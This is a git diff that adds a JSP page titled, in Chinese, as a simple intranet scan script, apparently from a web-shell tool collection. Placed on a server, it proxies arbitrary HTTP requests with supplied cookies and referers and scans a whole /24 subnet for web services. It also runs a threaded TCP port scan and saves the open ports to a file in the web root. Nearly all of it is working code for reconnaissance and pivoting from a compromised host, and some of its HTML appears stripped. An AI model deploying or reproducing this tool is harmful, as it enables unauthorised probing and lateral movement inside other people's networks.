diff --git a/jsp/netspy/netspy.jsp b/jsp/netspy/netspy.jsp
new file mode 100644
index 0000000..1a049b1
--- /dev/null
+++ b/jsp/netspy/netspy.jsp
@@ -0,0 +1,563 @@ +<%@page import="org.apache.commons.io.FileUtils"%> +<%@page import="java.io.File"%> +<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> +<%@ page isThreadSafe="false"%> +<%@page import="java.net.*"%> +<%@page import="java.io.PrintWriter"%> +<%@page import="java.io.BufferedReader"%> +<%@page import="java.io.FileReader"%> +<%@page import="java.io.FileWriter"%> +<%@page import="java.io.OutputStreamWriter"%> +<%@page import="java.util.regex.Matcher"%> +<%@page import="java.io.IOException"%> +<%@page import="java.net.InetAddress"%> +<%@page import="java.util.regex.Pattern"%> +<%@page import="java.net.HttpURLConnection"%> +<%@page import="java.util.concurrent.LinkedBlockingQueue"%> + + +<%!final static List list = new ArrayList(); + String referer = ""; + String cookie = ""; + String decode = "utf-8"; + int thread = 100; + //final static List scanportlist = new ArrayList(); + String cpath=""; + + //建立一个HTTP连接 + HttpURLConnection getHTTPConn(String urlString) { + try { + java.net.URL url = new java.net.URL(urlString); + java.net.HttpURLConnection conn = (java.net.HttpURLConnection) url + .openConnection(); + conn.setRequestMethod("GET"); + conn.addRequestProperty("User-Agent", + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)"); + conn.addRequestProperty("Accept-Encoding", "gzip"); + conn.addRequestProperty("referer", referer); + conn.addRequestProperty("cookie", cookie); + //conn.setInstanceFollowRedirects(false); + conn.setConnectTimeout(3000); + conn.setReadTimeout(3000); + + return conn; + } catch (Exception e) { + return null; + } + } + + String PostData(String urlString, String postString) { + HttpURLConnection http = null; + String response = null; + try { + java.net.URL url = new java.net.URL(urlString); + http = (HttpURLConnection) url.openConnection(); + http.setDoInput(true); + http.setDoOutput(true); + http.setUseCaches(false); + http.setConnectTimeout(50000); + http.setReadTimeout(50000); + 
http.setRequestMethod("POST"); + http.setRequestProperty("Content-Type", + "application/x-www-form-urlencoded"); + http.connect(); + OutputStreamWriter osw = new OutputStreamWriter( + http.getOutputStream(), decode); + osw.write(postString); + osw.flush(); + osw.close(); + response = getHtmlByInputStream(http.getInputStream(), decode); + } catch (Exception e) { + response = getHtmlByInputStream(http.getErrorStream(), decode); + } + return response; + } + + HttpURLConnection conn; + + //从输入流中读取源码 + String getHtmlByInputStream(java.io.InputStream is, String code) { + StringBuffer html = new StringBuffer(); + try { + + java.io.InputStreamReader isr = new java.io.InputStreamReader(is, + code); + java.io.BufferedReader br = new java.io.BufferedReader(isr); + String temp; + while ((temp = br.readLine()) != null) { + if (!temp.trim().equals("")) { + html.append(temp).append("\n"); + } + } + br.close(); + isr.close(); + } catch (Exception e) { + System.out.print(e.getMessage()); + } + + return html.toString(); + } + + //获取HTML源码 + String getHtmlContext(HttpURLConnection conn, String decode,boolean isError) { + Map result = new HashMap(); + String code = "utf-8"; + if (decode != null) { + code = decode; + } + try { + return getHtmlByInputStream(conn.getInputStream(), code); + } catch (Exception e) { + try { + if(isError){ + return getHtmlByInputStream(conn.getErrorStream(), code); + } + } catch (Exception e1) { + System.out.println("getHtmlContext2:" + e.getMessage()); + } + System.out.println("getHtmlContext:" + e.getMessage()); + return "null"; + } + } + + //获取Server头 + String getServerType(HttpURLConnection conn) { + try { + return conn.getHeaderField("Server"); + } catch (Exception e) { + return "null"; + } + + } + + //匹配标题 + String getTitle(String htmlSource) { + try { + List list = new ArrayList(); + String title = ""; + Pattern pa = Pattern.compile(".*?"); + Matcher ma = pa.matcher(htmlSource); + while (ma.find()) { + list.add(ma.group()); + } + for (int i = 0; i < 
list.size(); i++) { + title = title + list.get(i); + } + return title.replaceAll("<.*?>", ""); + } catch (Exception e) { + return null; + } + } + + //得到css + List getCss(String html, String url, String decode) { + List cssurl = new ArrayList(); + List csscode = new ArrayList(); + try { + + String title = ""; + Pattern pa = Pattern.compile(".*href=\"(.*)[.]css"); + Matcher ma = pa.matcher(html.toLowerCase()); + while (ma.find()) { + cssurl.add(ma.group(1) + ".css"); + } + + for (int i = 0; i < cssurl.size(); i++) { + String cssuuu = url + "/" + cssurl.get(i); + String csshtml = ""; + csscode.add(csshtml); + + } + } catch (Exception e) { + System.out.println("getCss:" + e.getMessage()); + } + return csscode; + + } + + //域名解析成IP + String getMyIPLocal() throws IOException { + InetAddress ia = InetAddress.getLocalHost(); + return ia.getHostAddress(); + } + + + + boolean getHostPort(String task){ + Socket client = null; + boolean isOpen=false; + try{ + String[] s=task.split(":"); + client = new Socket(s[0], Integer.parseInt(s[1])); + isOpen=true; + System.out.println("getHostPort:"+task); + //scanportlist.add(task+" >>> Open"); + saveScanReslt2(task+" >>> Open\r\n"); + }catch(Exception e){ + isOpen=false; + } + return isOpen; + } + + void getPath(String path){ + cpath=path; + } + +/* void saveScanReslt(String s){ + try{ + FileUtils.writeStringToFile(new File(cpath+"/port.txt"), s,"UTF-8",true); + }catch(Exception e){ + System.out.print(e.getLocalizedMessage()); + } + } */ + + void saveScanReslt2(String content) { + FileWriter writer = null; + try { + writer = new FileWriter(cpath+"/port.txt", true); + writer.write(content); + } catch (IOException e) { + System.out.print(e.getLocalizedMessage()); + } finally { + try { + if(writer != null){ + writer.close(); + } + } catch (IOException e) { + System.out.print(e.getLocalizedMessage()); + } + } + } + + + + String s="Result:
"; + String readPortResult(String portfile){ + File file = new File(portfile); + BufferedReader reader = null; + try { + System.out.println(""); + reader = new BufferedReader(new FileReader(file)); + String tempString = null; + while ((tempString = reader.readLine()) != null) { + s+=tempString+"
"; + } + reader.close(); + } catch (IOException e) { + return null; + } finally { + if (reader != null) { + try { + reader.close(); + } catch (IOException e1) { + return null; + } + } + } + return s; + } + + + %> + + + + + +内网简单扫描脚本 + + + +

+ 代理访问 Web扫描 端口扫描 +

+ +
+
+

+ Url: +

+

+ Method: Decode: +

+

+ + + +

+

+ Referer: +

+

+ +

+ +

+
+
+ + + + + +
+ + +<% + final JspWriter pwx = out; + String s = application.getRealPath("/") + "/port.txt"; + String result = readPortResult(s); + if (result != null) { + try { + pwx.println(result); + } catch (Exception e) { + System.out.print(e.getMessage()); + } + }else{ + pwx.println("如果你进行了端口扫描操作,那么这里将会显示扫描结果!
"); + } + String div1 = "
"; + String div2 = "
"; + + String u = request.getParameter("url"); + String ip = request.getParameter("ip"); + String scanip = request.getParameter("scanip"); + + if (u != null) { + + String post = request.getParameter("post"); + System.out.print(u); + System.out.print(post); + decode = request.getParameter("decode"); + String ref = request.getParameter("referer"); + String cook = request.getParameter("cookie"); + + if (ref != null) { + referer = ref; + } + if (cook != null) { + cookie = cook; + } + + String html = null; + + if (post != null) { + html = PostData(u, post); + } else { + html = getHtmlContext(getHTTPConn(u), decode, true); + } + + String reaplce = "href=\"http://127.0.0.1:8080/Jwebinfo/out.jsp?url="; + //html=html.replaceAll("href=['|\"]?http://(.*)['|\"]?", reaplce+"http://$1\""); + html = html.replaceAll("href=['|\"]?(?!http)(.*)['|\"]?", + reaplce + u + "$1"); + List css = getCss(html, u, decode); + String csshtml = ""; + if (!html.equals("null")) { + for (int i = 0; i < css.size(); i++) { + csshtml += css.get(i); + } + out.print(div1 + html + csshtml + div2); + } else { + response.setStatus(HttpServletResponse.SC_NOT_FOUND); + out.print("请求失败!"); + } + return; + } + + else if (ip != null) { + String threadpp = (request.getParameter("thread")); + String[] port = request.getParameter("port").split(","); + + if (threadpp != null) { + thread = Integer.parseInt(threadpp); + System.out.println(threadpp); + } + try { + try { + String http = "http://"; + String localIP = getMyIPLocal(); + if (ip != null) { + localIP = ip; + } + String useIP = localIP.substring(0, + localIP.lastIndexOf(".") + 1); + final Queue queue = new LinkedBlockingQueue(); + for (int i = 1; i <= 256; i++) { + for (int j = 0; j < port.length; j++) { + String url = http + useIP + i + ":" + port[j]; + queue.offer(url); + System.out.print(url); + } + + } + final JspWriter pw = out; + ThreadGroup tg = new ThreadGroup("c"); + for (int i = 0; i < thread; i++) { + new Thread(tg, new Runnable() { + public void 
run() { + while (true) { + String addr = queue.poll(); + if (addr != null) { + System.out.println(addr); + HttpURLConnection conn = getHTTPConn(addr); + String html = getHtmlContext(conn, + decode, false); + String title = getTitle(html); + String serverType = getServerType(conn); + String status = !html + .equals("null") ? "Success" + : "Fail"; + if (html != null + && !status.equals("Fail")) { + try { + pw.println(addr + " >> " + + title + ">>" + + serverType + + " >>" + status + + "
"); + } catch (Exception e) { + e.printStackTrace(); + } + } + } else { + return; + } + } + } + }).start(); + } + while (tg.activeCount() != 0) { + } + } catch (Exception e) { + e.printStackTrace(); + } + } catch (Exception e) { + out.println(e.toString()); + } + } else if (scanip != null) { + getPath(application.getRealPath("/")); + int thread = Integer.parseInt(request.getParameter("thread")); + String[] port = request.getParameter("scanport").split(","); + String ip1 = scanip; + String ip2 = request.getParameter("scanip2"); + + int start = Integer.parseInt(ip1.substring( + ip1.lastIndexOf(".") + 1, ip1.length())); + int end = Integer.parseInt(ip2.substring( + ip2.lastIndexOf(".") + 1, ip2.length())); + + String useIp = scanip.substring(0, scanip.lastIndexOf(".") + 1); + + System.out.println("start:" + start); + System.out.println("end:" + end); + + final Queue queue = new LinkedBlockingQueue(); + for (int i = start; i <= end; i++) { + for (int j = 0; j < port.length; j++) { + String scantarget = useIp + i + ":" + port[j]; + queue.offer(scantarget); + //System.out.println(scantarget); + } + + } + System.out.print("Count1:" + queue.size()); + final JspWriter pw = out; + ThreadGroup tg = new ThreadGroup("c"); + for (int i = 0; i < thread; i++) { + new Thread(tg, new Runnable() { + public void run() { + while (true) { + String scantask = queue.poll(); + if (scantask != null) { + getHostPort(scantask); + /* String result = null; + if(isOpen){ + result=scantask+ " >>> Open
"; + scanportlist.add(result); + System.out.println(result); + } */ + + /* try { + pw.println(result); + } catch (Exception e) { + System.out.print(e.getMessage()); + } */ + } + } + } + }).start(); + + } + /* while (tg.activeCount() != 0) { + } */ + try { + pw.println("扫描线程已经开始,请查看" + cpath+"/port.txt文件或者直接刷新本页面!"); + } catch (Exception e) { + System.out.print(e.getMessage()); + } + } +%>